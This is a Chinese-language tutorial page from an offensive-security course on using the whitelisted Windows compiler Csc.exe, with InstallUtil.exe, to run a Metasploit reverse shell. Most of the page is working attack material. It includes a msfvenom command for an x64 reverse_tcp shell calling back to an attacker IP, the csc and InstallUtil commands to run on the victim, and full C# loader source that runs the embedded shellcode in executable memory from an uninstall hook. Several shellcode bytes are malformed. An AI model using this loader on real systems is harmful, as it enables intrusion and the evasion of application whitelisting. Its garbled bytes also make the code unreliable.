Micro8
专注APT攻击与防御
Search…
前言
Preface
目录
第一章:生
1-10课
11-20课
21-30课
31-40课
41-50课
51-60课
61-70课
71-80课
第七十一课:基于白名单Msbuild.exe执行payload第一季
第七十二课:基于白名单Installutil.exe执行payload第二季
第七十三课:基于白名单Regasm.exe执行payload第三季
第七十四课:基于白名单Regsvcs.exe执行payload第四季
第七十五课:基于白名单Mshta.exe执行payload第五季
第七十六课:基于白名单Compiler.exe执行payload第六季
第七十七课:基于白名单Csc.exe执行payload第七季
第七十八课:基于白名单Msiexec执行payload第八季
第七十九课:基于白名单Regsvr32执行payload第九季
第八十课:基于白名单Wmic执行payload第十季
81-90课
91-100课
第二章:老(待更新...)
第三章:病(待更新...)
Powered By GitBook
第七十七课:基于白名单Csc.exe执行payload第七季
注:请多喝点热水或者凉白开,身体特别重要。

Csc.exe简介:

C#的在Windows平台下的编译器名称是Csc.exe,如果你的.NET FrameWork SDK安装在C盘,那么你可以在C:\WINNT\Microsoft.NET\Framework\xxxxx目录中发现它。为了使用方便,你可以手动把这个目录添加到Path环境变量中去。用Csc.exe编译HelloWorld.cs非常简单,打开命令提示符,并切换到存放 test.cs文件的目录中,输入下列行命令:csc /target:exe test.cs 将Ttest.cs 编译成名为 test.exe 的 console 应用程序
说明: Csc.exe所在路径没有被系统添加PATH环境变量中,因此,csc命令无法识别。

基于白名单Csc.exe配置payload:

Windows 7 默认位置:
1
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
2
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Copied!
攻击机:192.168.1.4 Debian 靶机:192.168.1.5 Windows 7

配置攻击机msf:

配置payload:

1
msfvenom ‐p windows/x64/shell/reverse_tcp LHOST=192.168.1.4 LPORT=53 ‐ f csharp
Copied!
copy buf 到 Micropoor_Csc.cs shellcode 中。

靶机执行:

1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.Ente rpriseServices.dll /r:System.IO.Compression.dll /target:library /out:Mic opoor.exe /platform:x64 /unsafe C:\Users\John\Desktop\Micropoor_Csc.cs
Copied!
1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\John\Desktop\Micropoor.exe
Copied!
与第七十二课相比,payload更为灵活。

附录:Micropoor_Csc.cs

1
using System;
2
3
using System.Net;
4
5
using System.Diagnostics;
6
7
using System.Reflection;
8
9
using System.Configuration.Install;
10
11
using System.Runtime.InteropServices;
12
13
14
// msfvenom ‐p windows/x64/shell/reverse_tcp LHOST=192.168.1.4 LPORT=53 ‐f csharp
15
16
public class Program
17
18
{
19
20
public static void Main()
21
22
{
23
24
}
25
26
27
}
28
29
[System.ComponentModel.RunInstaller(true)]
30
31
public class Sample : System.Configuration.Install.Installer
32
33
{
34
35
public override void Uninstall(System.Collections.IDictionary savedState)
36
37
{
38
39
Shellcode.Exec();
40
41
}
42
43
}
44
45
public class Shellcode
46
47
{
48
49
public static void Exec()
50
51
{
52
53
byte[] shellcode = new byte[510] {
54
55
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
56
57
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,x48,
58
59
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,xc9,
60
61
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,x41,
62
63
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,x48,
64
65
0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,x8b,
66
67
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,x8b,
68
69
0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,x41,
70
71
0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,xc1,
72
73
0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,x45,
74
75
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,x8b,
76
77
0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,x01,
78
79
0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,x48,
80
81
0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,xe9,
82
83
0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,x00,
84
85
0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,xe5,
86
87
0x49,0xbc,0x02,0x00,0x00,0x35,0xc0,0xa8,0x01,0x04,0x41,0x54,0x49,0x89,xe4,
88
89
0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,x68,
90
91
0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,x0a,
92
93
0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,x89,
94
95
0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,xd5,
96
97
0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,xba,
98
99
0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,xe5,
100
101
0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,xc9,
102
103
0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,xd5,
104
105
0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,x41,
106
107
0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,x41,
108
109
0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,x31,
110
111
0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,xc8,
112
113
0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,x40,
114
115
0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,xd5,
116
117
0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,x3c,
118
119
0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,x41,
120
121
0xff,0xe7,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,xd5 };
122
123
124
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode .Length,
125
126
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
127
128
Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
129
130
IntPtr hThread = IntPtr.Zero;
131
132
UInt32 threadId = 0;
133
134
IntPtr pinfo = IntPtr.Zero;
135
136
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
137
138
WaitForSingleObject(hThread, 0xFFFFFFFF);
139
140
}
141
142
private static UInt32 MEM_COMMIT = 0x1000;
143
144
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
145
146
[DllImport("kernel32")]
147
148
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
149
150
[DllImport("kernel32")]
151
152
private static extern bool VirtualFree(IntPtr lpAddress,
153
154
UInt32 dwSize, UInt32 dwFreeType);
155
156
[DllImport("kernel32")]
157
158
private static extern IntPtr CreateThread(
159
160
UInt32 lpThreadAttributes,
161
162
UInt32 dwStackSize,
163
164
UInt32 lpStartAddress,
165
166
IntPtr param,
167
168
UInt32 dwCreationFlags,
169
170
ref UInt32 lpThreadId
171
172
);
173
174
[DllImport("kernel32")]
175
176
private static extern bool CloseHandle(IntPtr handle);
177
178
[DllImport("kernel32")]
179
180
private static extern UInt32 WaitForSingleObject(
181
182
IntPtr hHandle,
183
184
UInt32 dwMilliseconds
185
186
);
187
188
[DllImport("kernel32")]
189
190
private static extern IntPtr GetModuleHandle(
191
192
string moduleName
193
194
);
195
196
[DllImport("kernel32")]
197
198
private static extern UInt32 GetProcAddress(
199
200
IntPtr hModule,
201
202
string procName
203
204
);
205
206
[DllImport("kernel32")]
207
208
private static extern UInt32 LoadLibrary(
209
210
string lpFileName
211
212
);
213
214
[DllImport("kernel32")]
215
216
private static extern UInt32 GetLastError();
217
218
}
Copied!
Micropoor
Previous
第七十六课:基于白名单Compiler.exe执行payload第六季
Next
第七十八课:基于白名单Msiexec执行payload第八季
Last modified 3yr ago
Copy link
Contents
Csc.exe简介:
基于白名单Csc.exe配置payload:
配置攻击机msf:
配置payload:
靶机执行:
附录:Micropoor_Csc.cs